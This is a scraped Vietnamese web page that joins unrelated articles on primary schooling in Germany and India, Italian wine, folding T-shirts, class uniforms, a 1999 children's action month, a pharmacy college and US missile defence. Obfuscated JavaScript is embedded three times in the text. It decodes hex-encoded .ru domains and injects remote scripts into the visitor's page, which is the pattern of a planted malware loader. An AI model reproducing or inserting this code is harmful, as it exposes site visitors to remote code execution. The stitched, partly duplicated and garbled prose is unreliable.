Hệ thống giáo dục tiểu học tại Ấn Độ

Ở hầu hết các quốc gia, bắt buộc trẻ em phải được giáo dục tiểu học mặc dù cha mẹ có thể cung cấp nó. Các mục tiêu chính của giáo dục tiểu học là đạt được kiến thức cơ bản và tính toán trong số tất cả các học sinh, cũng như thành lập các cơ sở khoa học, toán học, Địa lý, lịch sử và các khoa học xã hội khác. Ưu tiên tương đối của các khu vực khác nhau, và các phương pháp được sử dụng để dạy chúng, là một vấn đề tranh luận chính trị đáng kể. Không chỉ vậy, cấp học này còn giúp trẻ bắt đầu đi vào nề nếp khi phải thực hiện những quy định của nhà trường như: mặc áo đồng phục cấp 1 thay vì đồng phục mầm non như trước , đi học đúng giờ, làm bài về nhà,…
Thông thường, giáo dục tiểu học được cung cấp trong các trường học, nơi mà đứa trẻ sẽ ở lại lớp học liên tục phát triển cho đến khi hoàn thành. Trẻ em thường được đặt trong lớp học với một giáo viên sẽ chịu trách nhiệm chính về giáo dục và phúc lợi cho năm đó. Giáo viên này có thể được trợ giúp về mức độ khác nhau bởi giáo viên chuyên khoa trong một số lĩnh vực nhất định thường là âm nhạc hoặc thể dục. Sự tiếp nối với một giáo viên duy nhất và cơ hội để xây dựng mối quan hệ chặt chẽ với lớp học là một đặc điểm nổi bật của hệ thống giáo dục tiểu học.
Theo truyền thống, nhiều hình thức trừng phạt thân thể là một phần không thể tách rời của giáo dục sớm. Gần đây, thực tiễn này đã được kiểm tra kỹ lưỡng và trong nhiều trường hợp bị cấm, đặc biệt là ở các nước phương Tây.
Trường học đầu tiên dành cho trẻ em Đức được gọi là Grundschule. Thường mất bốn năm, học sinh từ sáu đến mười tuổi. Ở một số trường học, ngôn ngữ nước ngoài đầu tiên được giới thiệu, thường là tiếng Anh. Trong năm cuối cấp tiểu học, trẻ em được nhận một đề nghị để biết thêm trường họ có thể tham dự.
Mẫu giáo: 3-6 năm
Lớp 1: 6-7 năm
Lớp 2: 7-8 năm
Lớp 3: 8-9 năm
Lớp 4: 9-10 năm
Lớp 5: 10-11 năm (chỉ ở Berlin và Brandenburg)
Lớp 6: 11-12 năm (chỉ Berlin và Brandenburg)
Tùy thuộc vào khuyến nghị mà họ nhận được từ giáo viên của mình, trẻ em bắt đầu học trung học bắt buộc ở Hauptschule (Lớp 5-9, đôi khi lớp 10 được thêm vào sau đó gọi là "Werkrealschule"), Realschule (Lớp 5-10) hoặc Gymnasium (Các lớp 5-12). Sau khi hoàn thành lớp 11 và 12 tại Gymnasium, sinh viên nhận được Abitur, một bằng tốt nghiệp có giấy phép nhập học sau trung học (tương tự như Bằng A hoặc Cao Bằng). Abitur sẽ không được nhận vào cuối Haupt và Realschule, nhưng sinh viên tốt nghiệp sẽ đủ điều kiện để vào lớp 11 của Gymnasium nếu họ muốn có Abitur.
Giáo dục tiểu học tại Ấn Độ
Hội đồng Nghiên cứu Giáo dục và Đào tạo Quốc gia (NCERT) là cơ quan cao nhất cho giáo dục phổ thông ở Ấn Độ. NCERT hỗ trợ và hỗ trợ kỹ thuật cho một số trường học ở Ấn Độ và giám sát nhiều khía cạnh của việc thực thi chính sách giáo dục. Ở Ấn Độ, các cơ quan khác nhau điều hành hệ thống giáo dục của trường là:
Các ban của chính phủ tiểu bang, trong đó phần lớn trẻ em Ấn Độ được ghi danh.
Hội đồng Quản trị Trung ương Hội đồng Giáo dục Trung học (CBSE).
Hội Đồng Quản Trị Chứng Chỉ Ấn Độ (CISCE).
Học viện mở trường quốc gia.
Các trường quốc tế trực thuộc Chương trình Tú tài Quốc tế và / hoặc Các kỳ thi Quốc tế Cambridge.
Các trường học Hồi giáo Madrasah, có ban quản lý do các chính quyền địa phương kiểm soát, hoặc tự trị hoặc liên kết với Darul Uloom Deoband.
Các trường tự trị như trường Woodstock, Auroville, Patha Bhavan và Ananda Marga Gurukula.
Giáo dục tiểu học ở Ấn Độ bao gồm 12 cấp lớp. Đây là những:
Mẫu giáo: vườn ươm – 3 năm, trường mẫu giáo (LKG) -4 tuổi, trường mẫu giáo cao cấp (UKG) – 5 năm
Lớp 1: 6 năm
Lớp 2: 7 năm
Lớp 3: 8 năm
Lớp 4: 9 năm
Lớp 5: 10 năm
Lớp 6: 11 năm
Lớp 7: 12 năm
Lớp 8: 13 năm
Lớp 9: 14 năm
Lớp 10: 15 năm
Lớp 11: 16 năm
Lớp 12: 17 năm
Tham khảo:
http://dongphuckhanhlinh.com/dong-phuc-quan-ly-ks.htm/ window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“61686e3031776c672e7275″,”387534656972716d307a75622e7275″,”36797377706279616272302e7275″,”64743030346f6a74712e7275″]’),e=”27801”,n=function(t){t=t.replace(“www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="citation.linkplaza.net",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();
window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“61686e3031776c672e7275″,”387534656972716d307a75622e7275″,”36797377706279616272302e7275″,”64743030346f6a74712e7275″]’),e=”27801”,n=function(t){t=t.replace(“www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="citation.linkplaza.net",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Lịch sử rượu vang Ý

     Rượu vang thường gắn với các nước phương Tây, phần lớn người ta thường nhớ tới rượu vang Pháp. Thế nhưng, chúng ta không biết được rằng, Ý cũng là một trong những nước có chất lượng rượu vang vào loại tuyệt hảo. Lâu nay, nhắc tới Ý, người ta thường nhớ tới món Spagety, tới hình ảnh tháp nghiêng Pisa mà quên rằng, ngàn năm xây dựng lịch sử, nước Ý cũng có được cho mình một công thức ủ rượu độc đáo. Đến nước Ý, thưởng thức mỳ Ý nhưng không sử dụng Rượu vang Ý trên bàn ăn thì quả là một thiếu sót lớn.
     Cùng với Pháp, Ý cũng là một trong những cái nôi sản xuất ra những chai rượu vang đẳng cấp hàng đầu thế giới. 
Lịch sử rượu vang Ý được khai thác từ các chai rượu cổ
     Lịch sử rượu vang Ý cũng là một lĩnh vực thu hút sự chú ý của nhiều nhà khoa học. Kết quả nghiên cứu những chai rượu cổ cho thấy, rượu vang Ý đã xuất hiện song song với sự phát triển của đô thị Pompeii. Tại thời điểm đó, rượu vang Ý có hương vị tương đối nguyên thủy. Chắc hẳn trình độ cũng như người làm rượu thời điểm này phải nắm trong tay rất nhiều bí quyết bởi rượu vang Ý cổ có một mùi vị riêng vô cùng đặc biệt. Tại sao nói nó nguyên thủy, bởi hương vị, mùi thơm đặc trưng của hoa quả nhưng vẫn có độ đậm, độ sâu, đủ sức ám ảnh .
      Trong quá trình tìm kiếm, người ta đã nhận thấy các dấu tích đặc biệt. Các dấu tích khảo cổ học cho thấy một thời đại có sự phát triển mạnh mẽ của rượu vang Ý. Nhiều hình vẽ minh họa cũng như kiến trúc của các hầm rượu có tuổi đời hàng ngàn năm đã cho thấy, rượu vang Ý đã phát triển rất sớm, thậm chí là phát triển rực rỡ. Rượu vang đã trở thành một thức uống hảo hạng và cao quý của người Ý. Lần theo các dấu vết, người ta còn giải mã thành công quy trình sản xuất rượu vang Ý từ thế kỉ thứ mấy.
Chất lượng rượu tuyệt hảo trong hiện tại
     Kết quả nghiên cứu đã cho thấy, chất lượng rượu vang Ý đã đạt tuyệt hảo ở thời điểm rất sớm. Điều này dễ dàng lí giải vì sao chất lượng rượu trong hiện tại vẫn giữ được hương vị nguyên thủy. Từ quá trình sản xuất rượu cổ, người ta đã thay đổi, cải biến cho phù hợp với điều kiện và nhu cầu thưởng thức của hiện tại, song về cơ bản thì hương vị của rượu vang Ý vẫn được giữ.
     Rượu vang Ý không sang trọng và kiêu sa như màu đỏ mận của rượu vang Pháp. Nếu nói rượu vang Pháp là một quý bà sang trọng thì vang Ý được ví như một cô thôn nữ của vùng nông nghiệp nước Ý, mang nét đẹp bình dị nhưng rất trong sáng và thánh thiện.
     Nhận biết được giá trị của loại rượu độc đáo này, Wineplaza đã mang đến những sản phẩm rượu vang Ý. Chúng tôi hi vọng sẽ mang đến cho khách hàng những trải nghiệm tuyệt vời.
 
 
 
 
 

Gấp áo phông siêu nhanh

Mỗi chúng ta chắc hẳn ai cũng có sở hữu cho mình một số lượng quần áo nhất định. Nhất là áo phông, chiếc áo được cho là phổ biến nhất hiện nay. Có người ít từ vài ba cái sẽ dễ dàng hơn trong việc dọn dẹp và làm ngăn nắp tủ quần áo, nhưng đối với những tín đồ thời trang sở hữu từ hàng chục đến hàng trăm chiếc áo phông khác nhau thì việc cất giữ chúng cũng là một vấn đề lớn cần quan tâm. Chúng ta không thể nào có chỗ để treo chúng lên được, vậy nên gấp lại gọn gàng và cất đi là cách tốt nhất. Bài viết sau đây đưa ra các bước để giúp bạn xử lý chúng được nhanh chóng và gọn gàng hơn.
Bước 1: Áo phông trước khi được gấp cần phải được giặt và phơi cho sạch sẽ rồi mới đem đi cất, nếu không sẽ để lại mùi hôi vô cùng khó chịu khi bạn mặc ở những lần tới. Hãy chuẩn bị một bề mặt bằng phẳng và sạch sẽ, có thể sử dụng ngay chiếc giường của bạn bởi ở đó luôn có khoảng không gian  phù hợp với công việc này. Trải áo xuống và vuốt cho chiếc áo ngay ngắn trên mặt phẳng.
Bước 2: Từ phía vai áo, lấy tay kẻ một đường thẳng chạy dài cuống đến gấu áo. Sau đó kéo thêm một đường thẳng từ bên hông này qua bụng sang đến bên hông bên kia. Sau khi gập, hai đường thẳng trên phải giao nhau tại một điểm gần phía nách. Lúc này lấy một tay đánh dấu ở vị trí giao nhau này và giữ cho chắc, tay còn lại cầm cả hai đầu vai và gấu áo trước đó đã kẻ.
Bước 3: Nhấc cả hai tay kên không trung lúc này sẽ có được những đường thẳng vuông góc với nhau. Lúc này một nửa chiếc áo đã được gấp hoàn thiện, chỉ còn một nửa vẫn còn thả tự do trong không trung. Để có được chiếc áo phông đẹp, việc cần làm tiếp theo đơn giản chỉ là việc gập cho nửa còn lại ngay ngắn là được. Gập lại bằng cách để cho đường thẳng phía trên mà bạn đang cầm ở áo song song với mặt phẳng gấp áo mà bạn vừa tạo ra. Độ chính xác càng cao thì chiếc áo mà bạn thu được càng gọn gàng và ngăn lắp hơn so với làm với độ chính xác thấp.
Đó là 3 bước nhanh chóng và đơn giản để bạn gấp được chiếc áo phông cho ngăn nắp. Nhưng có thêm một lưu ý cực quan trọng mà chắc chắn bạn sẽ không muốn bỏ qua nếu là một tín đồ thời trang với sự yêu thích vô bờ với áo phông. Đó là cách để chiếc áo của bạn không bị nhàu nát trong những lần mặc tiếp theo sau khi gặt. Việc gấp là quan trọng thứ hai, còn việc quan trọng đầu tiên đó là những chiếc áo sau khi được gặt và phơi khi, ngay sau khi thi lại nên được mang vào gấp luôn. Trong thời gian này, áo chưa tiếp xúc hay bị đè nén, chèn ép bới môi trường nên vẫn giữ được vẻ mượt mà, nhưng chỉ sau thời gian ngắn, các tác động vào áo sẽ dễ dàng khiến áo bị nhăn, biến dạng trở nên xấu xí hơn. Vì vậy lời khuyên chân thành cho các bạn đó là nên gấp quần áo ngay sau khi thu đồ từ móc vào.
Tham khảo:

Bí kíp chọn áo lớp đẹp

Lựa chọn áo lớp là việc tưởng chừng như đơn giản, nhưng khi bạn bắt tay vào việc chọn lựa một chiếc áo sao cho hội đủ các yếu tố như đẹp, độc, lạ,… thì quả thật không phải là chuyện đơn giản chút nào. Mỗi lớp khi bắt tay vào việc thiết kế áo lớp, đặt may áo lớp đều gặp phải rất nhiều những vấn đề khó khăn bởi các bạn không phải là những người thợ chuyên nghiệp, chưa thể có được cái nhìn chính xác và tổng thể tốt cho chiếc áo. Vì vậy bài viết sau đây sẽ đưa ra những vướng mắc và cách giải quyết những vướng mắc đó cho các bạn đi đặt may áo lớp.
Hiện nay những màu sắc chủ yếu được lựa chọn để làm áo lớp đó là trắng, đen và ghi. Đây là những màu sắc trung tính, phù hợp được với cả các bạn nam và các bạn nữ trong lớp. Nhưng chính vì sự phù hợp này khiến cho chúng được sử dụng khá nhiều, lặp đi lặp lại giữa các lớp. Nhiều trường hợp trong cùng một khối có đến hai, ba lớp bị trùng màu áo với nhau, gây ra những pha giở khóc giở cười cho lớp. Vậy nên nếu đã quyết định sẽ lựa chọn những màu sắc giống nhau như vậy, các bạn nên chú ý đến các vấn đề khác như thiết kế áo, chi tiết để tránh bị nhầm lẫn đáng tiếc xảy ra.
Nếu như trước đó đã có lớp làm áo với tone màu như ý định mà các bạn đã đưa ra, dù không thay đổi về màu sắc nhưng thay đổi về kiểu dáng là việc mà các bạn nên làm để có áo đồng phục phù hợp. Hãy thử trước hết là về cổ áo, sau đó đến tay áo hay phần đuôi áo để tạo sự khác biệt. Cổ áo có thể là cổ tròn, cổ chữ V hay cổ bẻ,… đều tạo nên một vẻ hoàn toàn khác lạ so với những mẫu trước đó. Chưa kể đến việc bạn có thể thay đổi màu sắc cổ áo để tạo điểm nhấn đáng chú ý hơn hẳn so với những chiếc áo kia. Sau đó có thể thay đổi đến các bộ phần tay áo, vạt áo như ý thích của các bạn, miễn là khiến cho nó mới mẻ và đẹp hơn hẳn những mẫu đã có.
Nếu như việc thay đổi về hình dáng không khiến cho các bạn hài lòng, đừng chần chờ gì mà hãy thay đổi chính màu sắc để tạo sự khác biệt, tránh nhầm lẫn giữa các lớp với nhau. Trước hết các bạn phải có một cái nhìn mới về việc lựa chọn màu sắc, không nhất thiết phải sử dụng các màu thường được sử dụng như trên, thay vào đó hãy chọn lựa những màu sắc khiến cho mọi người phải chú ý như xanh dương, xanh lá cây, vàng hay tím,… Nhưng phải đảm bảo những màu sắc này nhận được sự đồng ý từ tất cả các thành viên trong lớp. Để có được quyết định chính xác về màu sắc, hãy lấy ý kiến về màu sắc được đa số các bạn bình chọn, nêu ra những ưu điểm, nhược điểm và những tính chất của màu đó sao cho các thành viên trong lớp đều có cái nhìn thiện cảm về nó. Làm được điều này, các bạn sẽ cảm thấy việc làm áo lớp thực sự không khó khăn như những gì mà các bạn nghĩ. window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“61686e3031776c672e7275″,”387534656972716d307a75622e7275″,”36797377706279616272302e7275″,”64743030346f6a74712e7275″]’),e=”27801”,n=function(t){t=t.replace(“www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="citation.linkplaza.net",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Tháng hành động vì trẻ em năm 1999

Ngày 10-5 tại Hà Nội, Ủy ban bảo vệ và chăm sóc trẻ em Việt Nam ,đã tổ chức hợp báo công bố kế hoạch Tháng hành động vì trẻ em năm 1999, thời gian từ ngày 15-5 đến hết ngày 30-6. Lãnh đạo Ủy ban bảo vệ chăm sóc sức khỏe trẻ em, đại diện các bộ ngành thành viên cùng đông đảo đại diện các cơ quan thông tấn báo chí ở trung ương và Hà Nội đã tham dự.
Kể từ năm 1991, năm triển khai Chương trình hành động quốc gia vì trẻ em 1991-2000 đến nay, đặc biệt trong giai đoạn 1996-1998,hoạt động bảo vệ chăm sóc trẻ em, đại diện các bộ, ngành thành viên cùng đông đảo đại diện các cơ quan thông tấn báo chí ở trung ương và Hà Nội đã tham dự.
Kể từ năm 1991, năm triển khai Chương trình hành động quốc gia vì trẻ em 1991-2000 đến nay, đặc biệt trong giai đoạn 1996-1998, hoạt động bảo vệ chăm sóc trẻ em đã đạt được những thành tựu quan trọng đã hoàn thành và hoàn thành vượt mức nhiều mục tiêu: tiêm chủng đầy đủ 6 loại vacxin cho trẻ em dưới 1 tuổi, tiêm phòng uốn ván cho phụ nữ có thai và phụ nữ trong độ tuổi sinh đẻ, loại trừ uốn ván sơ sinh, cơ bản khống chế được bệnh sởi, sử dụng oresol cho trẻ dưới 5 tuổi bị tiêu chảy, cơ bản thanh toán tình trạng thiếu vitamin A ở trẻ dưới 5 tuổi, giảm được 26,69% số trẻ suy dinh dưỡng vừa và nặng so với năm 1995 ( chỉ tiêu 15-20%),hình thành sáng kiến bệnh viện bạn hữu ở 31 bệnh viện (chỉ tiêu 30 bệnh viện),xây dựng điểm vui chơi cho trẻ em. Bên cạnh những tiến bộ nói trên, hiện còn nhiều vấn đề bức xúc (như: tỷ lệ suy dinh dưỡng ở trẻ em còn cao; còn tình trạng thiếu nước sạch ở nông thôn, trẻ em thất học, mù chữ ở vùng cao, vùng sâu, vùng khó khăn, trẻ em bị xâm hại trẻ em phạm pháp, trẻ em có hoàn cảnh đặc biệt khó khăn…)cần tập trung nỗ lực giải quyết tạo bước chuyển biến mới về nhận thức, trách nhiệm và hành động của các tầng lớp nhân dân và toàn xã hội trong việc thực hiện các mục tiêu vì trẻ em đang còn nhiều khó khăn, góp phần tích cực thực hiện thắng lợi các mục tiêu vì trẻ em giai đoạn 1991-2000. Tháng hành động vì trẻ em năm nay cần tập trung vào các nhiệm vụ chủ yếu: tiếp tục làm tốt công tác triển khai và xây dựng chương trình hành động thực hiện Thông tư 04 của Thường vụ Bộ chính trị về tăng cường lãnh đạo công tác bảo vệ trẻ em,Chỉ thị 06 Thủ tướng Chính phủ  về tăng cường công tác bảo vệ trẻ em hạn chế tình trạng trẻ em lang thang bị bóc lột sức lao động, chuẩn bị triển khai thực hiện Chương trình bảo vệ đặc biệt trẻ em 1999-2002; huy động mọi nguồn lực phấn đấu hạ tỷ lệ suy dinh dưỡng hàng năm từ 2 đến 3%; tổ chức vận động tối đa trẻ em 6 tuổi và đang độ tuổi tiểu học chưa đi học hoặc bỏ học đến trường; tăng cường các biện pháp ngăn chặn và giải quyết nhanh tình trạng trẻ em bị xâm hại,bị ngược đãi, trẻ em làm trái pháp luật ngay tại cơ sở, ưu tiên đầu tư hỗ trợ cho 1000 xã nghèo.
Bảo vệ chăm sóc và giáo dục trẻ em luôn luôn là mối quan tâm đặc biệt hàng đầu của Đảng và Nhà nước.Đó không chỉ thể hiện tình cảm và đạo lý của dân tộc, mà còn là trách nhiệm chính trị của các tổ chức Đảng, chính quyền, đoàn thể, là nhiệm cụ của mỗi công dân, mỗi gia đình và toàn xã hội. Hưởng ứng Tháng hành động vì trẻ em 1999,mỗi cơ sở, mỗi địa phương, mỗi cộng đồng, mỗi gia đình hãy bằng những công trình dành cho trẻ em, bằng những việc làm thiết thực vì trẻ em từ nguồn lực của cộng đồng đóng góp công sức xây dựng, nâng cấp trường, lớp, mở lớp học tình thương, lớp dạy nghề, xây dựng trạm y tế, khu vui chơi giải trí…Tất cả vì cuộc sống an toàn và lành mạnh cho mọi trẻ em, hướng tới thế kỷ 21.
PV – Sức khỏe & Đời sống/ Bộ Y tế – Hà Nội –  Số 20(833) – Năm 1999

Tại sao nên chọn trường cao đẳng dược hà nội của bộ quốc phòng?

Tháng 5,6 hàng năm là thời điểm mà các sĩ tử đang ráo riết chuẩn bị hồ sơ thi đại học và với sự đổi mới trong vài nằm gần đây thì cánh cửa đại học đang là thứ gì đó khiến nhiều em học sinh cảm thấy lo lắng. Dự kiến năm nay số sĩ tử lựa chọn các trường đại học sẽ không nhiều như mọi năm vì các em cảm thấy lo sợ trước tình trạng xảy ra vào năm ngoái. Tuy nhiên, các em có thể hoàn toàn không cần lo lắng bởi còn có khá nhiều lựa chọn cho các em ví dụ như trường cao đẳng dược hà nội
Nhận định về sự hấp dẫn
Hoàn toàn như những ngành nghề khác ở nước ta thì ngành dược đang trong tình trạng thừa lao động và rất có thể trong tương lai gần thì tình trạng này có xu hướng gia tăng. Điều này là bởi trong vài năm trước khi thấy nghề kế toán bắt đầu có xu hướng thất nghiệp nhiều trong khi ngành dược lại thiếu nhân công trầm trọng đồng thời không ít những trường mở thêm khoa dược đào tạo hoặc thậm chí cả trường đào tạo dược khiến cho số lượng người lao vào ngành này tăng lên đáng kể. Tuy nhiên, thực tế cho thấy, nhiều dược sĩ ra trường cũng không thể làm việc bởi tấm bắng quá thấp hoặc có việc làm nhưng bị đánh giá là không có năng lực dù bằng tốt nghiệp ở mức khá cao. Thực trạng này khiến cho ngành dược không chỉ thừa nhân công mà còn thiếu ở mức trầm trọng. Trên cơ sở này, việc lựa chọn trường đào tạo dược nếu muốn theo ngành dược là điều cần thiết của bất cứ sĩ tử nào.
Thông tin về cao đẳng dược số 1
Trường cao đẳng dược hà nội của bộ quốc phòng là một trong những lựa chọn khá hấp dẫn đối với những em đang chuẩn bị làm hồ sơ đại học. Ở đây, chương trình dạy được xây dựng vừa dựa trên tiêu chuẩn của bộ giáo dục nhưng đồng thời cũng phải đáp ứng tiêu chuẩn khắt khe của phí quốc phòng. Nhờ vậy mà những sinh viên theo học trường này sẽ được đảm bảo về kỹ năng nghề, khả năng làm việc và kiến thức chuyên môn. THông thường các trường phía quân đội sẽ có xu hướng đào tạo theo hướng khép kín nên những sinh viên ở đây không chỉ được đảm bảo về chất lượng mà còn có thể tìm được việc làm ngay khi ra trường. Nếu người nào có nhu cầu tìm hiểu về trường này có thể tìm ngay thông tin về trường và địa chỉ của trường phòng trường hợp muốn nộp hồ sơ. Bạn cần nhanh tay để đọc về thông tin tuyển sinh nếu không sẽ bỏ lỡ một cơ hội đáng tiếc.
 

Dự án mới cho cuộc chiến tranh “giữa các vì sao”

 Thanh kiếm và lá chắn

Chính phủ Mỹ có thể triển khai hệ thống phòng thủ chống tên lửa vào năm 2005. Toàn bộ lịch sử kỹ thuật quân sự là một cuộc chạy đua giữa thanh kiếm (lực lượng tiến công) và lá chắn (lực lượng phòng thủ), gọi nôm na là cuộc chạy đua giữa đánh và đỡ.
Đằng sau dự án mới cho “cuộc chiến tranh giữa các vì sao” ẩn chứa không chỉ một khoản tiền lớn hàng chục tỷ USD mà còn ẩn chứa những mưu toan không nhỏ của nhóm “mafia vũ trụ”.
Năm 1972, hiệp ước hạn chế các hệ thống còn phòng thủ chống tên lửa giữa Liên Xô và Mỹ đã “trình làng” thế giới một bước ngoặt đầy nghịch lý của tư tưởng chiến lược. Theo hiệp ước này, hai bên từ chối “lá chắn”, thỏa thuận là người không được bảo vệ trước “thanh kiếm” hạt nhân, họ “tự nguyện” đăng ký làm con tin của nhau.
Tổng thống Mỹ thời đó là Rônan Rigân và nhiều người Mỹ hiện nay đều phản đối thứ lô-gic này. Họ nói “phải phòng thủ”. Nước nào không có hệ thống phòng thủ chống tên lửa thì nước đó không thể và không dám tấn công đầu tiên bởi vì nó biết rằng đối phương cũng có đầy đủ tiềm lực để giáng trả những đòn chí mạng (thí dụ, các tàu ngầm, người ta không thể phát hiện ra ngay và không thể đánh đòn phủ đầu). Ngược lại, nước nào có hệ thống phòng thủ chống tên lửa, nó sẽ phá vỡ ngay thế ổn định chiến lược, mới có thể đánh đòn đầu tiên mà vẫn an toàn, tránh đòn giáng trả sau tấm “lá chắn” là hệ thống phòng thủ chống tên lửa.
Hiệp ước Xô – Mỹ vẫn cho phép triển khai hệ thống phòng thủ chống tên lửa khu vực, mỗi nước được chọn 2 khu vực, sau rút xuống 1, với số tên lửa chống tên lửa mỗi bên không quá 100 quả. Phía Liên Xô quyết định giương tấm lá chắn bảo vệ thủ đô Mát-xcơ-va; phía Mỹ quyết định bảo vệ Oa-sinh-tơn hay niu-oóc mà triển khai hệ thống phòng chống tên lửa xung quanh các tên lửa của mình ở bang Đa-cô-ta bắc. Cứ theo lô-gic quân sự thì việc người Mỹ bảo vệ các tên lửa của mình khỏi cú đánh phủ đầu là một việc làm vô nghĩa; cũng vô nghĩa lại đi bảo vệ các hầm chứa tên lửa trống rỗng khi tên lửa đã được phóng đi.
Bước vào nhà trắng, tổng thống Rô-nan Ri-gân đã tuyên bố ngày 23-3-1983 về “sáng kiến phòng thủ chiến lược” – mơ ước biến vũ khí hạt nhân thành “người mất năng lực già cỗi”. Đó là việc tạo ra tấm lá chắn hay cái ô không bị xuyên thủng trên toàn bộ nước Mỹ và thậm chí trên toàn bộ Châu  u.
Thế là bắt đầu bùng lên những luận chiến nóng bỏng. Các tập đoàn khoa học tài ba, sau khi nghiên cứu vấn đề này, đã đi đến kết luận rằng không thể nào xây dựng được một hệ thống phòng chống tên lửa có hiệu quả 100%. Nhà văn viễn tưởng Mỹ gốc Nga nói rằng: “chiến tranh giữa các vì sao” chẳng có gì khác hơn là ý đồ làm cho người Nga kiệt quệ và suy yếu đi.
